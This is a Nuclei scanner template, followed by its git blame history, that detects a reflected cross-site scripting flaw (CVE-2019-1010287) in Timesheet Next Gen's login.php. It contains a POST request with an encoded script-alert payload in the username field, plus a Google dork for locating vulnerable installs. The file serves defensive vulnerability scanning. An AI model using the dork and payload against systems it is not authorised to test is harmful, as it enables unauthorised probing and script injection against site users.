nuclei-templates/cves/2019/CVE-2019-1010287.yaml

id: CVE-2019-1010287

info:
  name: Timesheet 1.5.3 - Cross Site Scripting
  author: pikpikcu
  severity: medium
  description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url."
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
    - http://www.mdh-tz.info/  # demo
  tags: cve,cve2019,timesheet,xss
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2019-1010287
    cwe-id: CWE-79
  metadata:
    google-dork: inurl:"/timesheet/login.php"

requests:
  - raw:
      - |
        POST /timesheet/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '><script>javascript:alert(document.domain)</script>'
        part: body
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-1010287`
Create CVE-2019-1010287.yaml 2020-09-04 10:01:06 +00:00
			`info:`
			`name: Timesheet 1.5.3 - Cross Site Scripting`
			`author: pikpikcu`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: medium`
Metadata attribute update 2021-09-16 15:54:33 +00:00			`description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url."`
Changes fixes/around dynamic attributes ("additional-fields") Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:17:27 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2019-1010287`
Dashboard Enhancements (#3722) * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Enhancement: cves/2010/CVE-2010-1957.yaml by mp * Enhancement: cves/2010/CVE-2010-1977.yaml by mp * Enhancement: cves/2010/CVE-2010-1979.yaml by mp * Enhancement: cves/2010/CVE-2010-1980.yaml by mp * Enhancement: cves/2010/CVE-2010-1981.yaml by mp * Enhancement: cves/2010/CVE-2010-1982.yaml by mp * Enhancement: cves/2010/CVE-2010-1983.yaml by mp * Enhancement: cves/2010/CVE-2010-2033.yaml by mp * Enhancement: cves/2010/CVE-2010-2034.yaml by mp * Enhancement: cves/2010/CVE-2010-2035.yaml by mp * Enhancement: cves/2010/CVE-2010-2036.yaml by mp * Enhancement: cves/2010/CVE-2010-2037.yaml by mp * Enhancement: cves/2010/CVE-2010-2045.yaml by mp * Enhancement: cves/2010/CVE-2010-2050.yaml by mp * Enhancement: cves/2010/CVE-2010-2122.yaml by mp * Enhancement: cves/2010/CVE-2010-1980.yaml by mp * Enhancement: cves/2010/CVE-2010-1981.yaml by mp * Enhancement: cves/2010/CVE-2010-1982.yaml by mp * Enhancement: cves/2010/CVE-2010-2035.yaml by mp * Enhancement: cves/2010/CVE-2010-2128.yaml by mp * Enhancement: cves/2010/CVE-2010-2259.yaml by mp * Enhancement: cves/2010/CVE-2010-2307.yaml by mp * Enhancement: cves/2010/CVE-2010-2507.yaml by mp * Enhancement: cves/2010/CVE-2010-2680.yaml by mp * Enhancement: cves/2010/CVE-2010-2682.yaml by mp * Enhancement: cves/2010/CVE-2010-2857.yaml by mp * Enhancement: cves/2010/CVE-2010-2861.yaml by mp * Enhancement: cves/2010/CVE-2010-2918.yaml by mp * Enhancement: cves/2010/CVE-2010-2920.yaml by mp * Enhancement: cves/2010/CVE-2010-3203.yaml by mp * Enhancement: cves/2010/CVE-2010-3426.yaml by mp * Enhancement: cves/2010/CVE-2010-4617.yaml by mp * Enhancement: cves/2010/CVE-2010-4231.yaml by mp * Enhancement: cves/2010/CVE-2010-4282.yaml by mp * Enhancement: cves/2010/CVE-2010-4282.yaml by mp * Enhancement: cves/2010/CVE-2010-4617.yaml by mp * Enhancement: cves/2010/CVE-2010-4719.yaml by mp * Enhancement: cves/2010/CVE-2010-4769.yaml by mp * Enhancement: cves/2010/CVE-2010-4977.yaml by mp * Enhancement: cves/2010/CVE-2010-5028.yaml by mp * Enhancement: cves/2010/CVE-2010-5278.yaml by mp * Enhancement: cves/2010/CVE-2010-5286.yaml by mp * Enhancement: cves/2011/CVE-2011-0049.yaml by mp * Enhancement: cves/2011/CVE-2011-1669.yaml by mp * Enhancement: cves/2011/CVE-2011-2744.yaml by mp * Enhancement: cves/2000/CVE-2000-0114.yaml by mp * Enhancement: cves/2011/CVE-2011-3315.yaml by mp * Enhancement: cves/2011/CVE-2011-4336.yaml by mp * Enhancement: cves/2011/CVE-2011-4618.yaml by mp * Enhancement: cves/2011/CVE-2011-4624.yaml by mp * Enhancement: cves/2011/CVE-2011-4804.yaml by mp * Enhancement: cves/2011/CVE-2011-0049.yaml by mp * Enhancement: cves/2011/CVE-2011-2780.yaml by mp * Enhancement: cves/2011/CVE-2011-2780.yaml by mp * Enhancement: cves/2012/CVE-2012-1823.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp * Enhancement: cves/2012/CVE-2012-1226.yaml by mp * Enhancement: cves/2012/CVE-2012-0996.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by cs * Enhancement: cves/2021/CVE-2021-27358.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2012/CVE-2012-1835.yaml by mp * Enhancement: cves/2012/CVE-2012-0901.yaml by mp * Enhancement: cves/2011/CVE-2011-5265.yaml by mp * Enhancement: cves/2011/CVE-2011-5181.yaml by mp * Enhancement: cves/2011/CVE-2011-5179.yaml by mp * Enhancement: cves/2011/CVE-2011-5107.yaml by mp * Enhancement: cves/2011/CVE-2011-5106.yaml by mp * Enhancement: cves/2011/CVE-2011-4926.yaml by mp * Enhancement: cves/2012/CVE-2012-0991.yaml by mp * Enhancement: cves/2012/CVE-2012-0981.yaml by mp * Enhancement: cves/2012/CVE-2012-0896.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp Fix "too few spaces before comment" lint errors Co-authored-by: sullo <sullo@cirt.net> 2022-02-21 18:33:16 +00:00			`- http://www.mdh-tz.info/ # demo`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2019,timesheet,xss`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.10`
			`cve-id: CVE-2019-1010287`
			`cwe-id: CWE-79`
Metadata attribute update 2021-09-16 15:54:33 +00:00			`metadata:`
			`google-dork: inurl:"/timesheet/login.php"`
Create CVE-2019-1010287.yaml 2020-09-04 10:01:06 +00:00
			`requests:`
Metadata attribute update 2021-09-16 15:54:33 +00:00			`- raw:`
Create CVE-2019-1010287.yaml 2020-09-04 10:01:06 +00:00			`- \|`
			`POST /timesheet/login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00
Create CVE-2019-1010287.yaml 2020-09-04 10:01:06 +00:00			`- type: word`
			`words:`
			`- '><script>javascript:alert(document.domain)</script>'`
			`part: body`